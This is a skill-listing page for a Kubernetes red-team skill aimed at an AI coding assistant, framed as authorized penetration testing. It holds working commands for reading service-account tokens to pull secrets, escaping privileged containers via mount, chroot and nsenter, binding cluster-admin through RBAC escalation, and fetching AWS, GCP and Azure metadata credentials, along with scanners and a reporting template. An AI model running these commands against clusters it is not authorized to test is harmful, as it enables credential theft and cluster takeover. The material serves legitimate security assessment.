k8s-security-redteam

Use when conducting authorized penetration tests, performing security assessments, running red team exercises, testing security controls, identifying attack paths, or validating hardening measures

Safety Notice

This listing is imported from skills.sh public index metadata. Review upstream SKILL.md and repository scripts before running.

Copy this and send it to your AI assistant to learn

Install skill "k8s-security-redteam" with this command: npx skills add foxj77/claude-code-skills/foxj77-claude-code-skills-k8s-security-redteam

Kubernetes Security Red Team

Perform offensive security testing of Kubernetes platforms including penetration testing, attack paths, and vulnerability assessment.

Keywords

kubernetes, security, red team, penetration testing, pentest, attack, exploiting, exploit, privilege escalation, container escape, rbac, secrets, vulnerability, assessment, offensive, conducting, performing, running, testing, identifying, validating

When to Use This Skill

  • Conducting authorized penetration tests
  • Performing security assessments
  • Running red team exercises
  • Testing security controls
  • Identifying attack paths
  • Validating hardening measures

IMPORTANT: Only use these techniques on systems you have explicit written authorization to test.

Related Skills

Quick Reference

TaskCommand
Check permissionskubectl auth can-i --list
Find privileged podskubectl get pods -A -o json | jq '.items[] | select(.spec.containers[].securityContext.privileged==true)'
List secretskubectl get secrets -A
Test anonymous accesskubectl --as=system:anonymous auth can-i --list

Attack Surface

External

  • Kubernetes API (TCP 6443)
  • Ingress controllers (TCP 80, 443)
  • NodePort services (TCP 30000-32767)
  • Exposed dashboards
  • Cloud metadata endpoints

Internal (from compromised pod)

  • Service account tokens
  • Secrets in environment/volumes
  • Network connectivity
  • Mounted volumes
  • Cloud IMDS

Reconnaissance

External

# Port scan
nmap -sV -p 6443,443,80,30000-32767 ${TARGET}

# Check anonymous access
curl -k https://${API_SERVER}:6443/api/v1/namespaces

# Test anonymous auth
kubectl --server=https://${API}:6443 --insecure-skip-tls-verify auth can-i --list

Internal (from pod)

# Current permissions
kubectl auth can-i --list

# SA token location
cat /var/run/secrets/kubernetes.io/serviceaccount/token

# Enumerate
kubectl get namespaces
kubectl get secrets -A
kubectl get pods -A -o wide

Attack Paths

1. Service Account Token Abuse

TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
APISERVER=https://kubernetes.default.svc

curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
  $APISERVER/api/v1/namespaces/default/secrets

2. Privileged Container Escape

# Mount host filesystem
mkdir /host && mount /dev/sda1 /host
chroot /host

# Or nsenter
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash

3. RBAC Escalation

# Check dangerous permissions
kubectl auth can-i escalate roles
kubectl auth can-i bind clusterroles
kubectl auth can-i impersonate users
kubectl auth can-i create pods/exec

# Escalate if can create rolebindings
kubectl create rolebinding pwn --clusterrole=cluster-admin --user=$(whoami)

4. Cloud Metadata Exploitation

AWS:

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

GCP:

curl -H "Metadata-Flavor: Google" \
  http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token

Azure:

curl -H "Metadata: true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

Cloud-Specific Attacks

AWS EKS

  • IRSA token theft from projected SA volumes
  • Node IAM role abuse via IMDS
  • aws-auth ConfigMap manipulation
  • EKS cluster role misconfiguration

GCP GKE

  • Workload Identity token theft
  • Metadata concealment bypass
  • GKE node service account abuse
  • Anthos Config Management exploitation

Azure AKS

  • Azure AD Pod Identity abuse
  • Managed Identity exploitation
  • AKS RBAC misconfiguration
  • Key Vault access via MI

Vulnerability Assessment Tools

Installation

# kubescape
brew install kubescape

# trivy (includes cluster scanning, image scanning, and k8s misconfiguration detection)
brew install trivy

Note: kube-hunter (formerly by Aqua Security) has been deprecated and is no longer maintained. Use trivy k8s for equivalent cluster vulnerability scanning.

Running Scans

# kubescape
kubescape scan framework nsa,mitre

# trivy cluster scan (replaces kube-hunter)
trivy k8s --report summary cluster

# trivy targeted scan
trivy k8s --namespace ${NAMESPACE} --report all

Testing Checklist

Authentication

  • Anonymous API access
  • Default dashboard credentials
  • Weak service account tokens
  • Missing token expiration

Authorization

  • Overly permissive RBAC
  • Privilege escalation paths
  • Cross-namespace access
  • Wrong secret access

Network

  • Missing network policies
  • Unrestricted pod traffic
  • Metadata endpoint access
  • External exposure

Container

  • Privileged containers
  • Host namespace access
  • Writable root filesystem
  • Capabilities not dropped

MITRE ATT&CK Mapping

TechniqueIDTest
Valid AccountsT1078Token leakage
Container AdminT1609kubectl exec
Escape to HostT1611Privileged abuse
Credential AccessT1555Secret enumeration
Lateral MovementT1021Pod-to-pod access

Reporting

Finding Template

## [CRITICAL/HIGH/MEDIUM/LOW] Finding Title

**Description**: What the vulnerability is

**Impact**: What an attacker could do

**Evidence**:
- Commands and output

**Affected Resources**:
- Specific resources

**Remediation**:
1. Immediate fix
2. Long-term solution

**References**:
- CIS control
- MITRE technique

Common Mistakes

MistakeWhy It FailsInstead
Testing production clusters without written scope documentCauses unplanned outages; legal and compliance exposureGet explicit written authorization defining scope, timing, and boundaries
Exploiting a vulnerability without documenting the stepsFinding cannot be reproduced or verified; remediation team cannot confirm fixRecord exact commands and outputs as you go
Leaving privileged pods or RoleBindings after testingAttackers can reuse your test artifacts as real attack vectorsClean up all artifacts immediately after each test phase
Assuming RBAC is the only access controlNetwork-level access, cloud IAM, and metadata endpoints bypass RBAC entirelyTest all attack surfaces: RBAC, network, cloud IMDS, runtime
Running scans at peak traffic hoursScanning generates load; may trigger alerts and degrade user experienceSchedule intensive scans during maintenance windows

Ethical Guidelines

  1. Written authorization required before testing
  2. Scope clearly defined and respected
  3. No production data exfiltration
  4. Report all findings responsibly
  5. Clean up any artifacts created
  6. Document everything for reproducibility

Source Transparency

This detail page is rendered from real SKILL.md content. Trust labels are metadata-based hints, not a safety guarantee.

Open in GitHubOpen in ClawHub

Related Skills

Related by shared tags or category signals.

Security

k8s-security-hardening

No summary provided by upstream source.

Repository SourceNeeds Review
3-foxj77
Coding

helm-chart-review

No summary provided by upstream source.

Repository SourceNeeds Review
3-foxj77
Coding

k8s-platform-tenancy

No summary provided by upstream source.

Repository SourceNeeds Review
3-foxj77
Coding

k8s-continual-improvement

No summary provided by upstream source.

Repository SourceNeeds Review
3-foxj77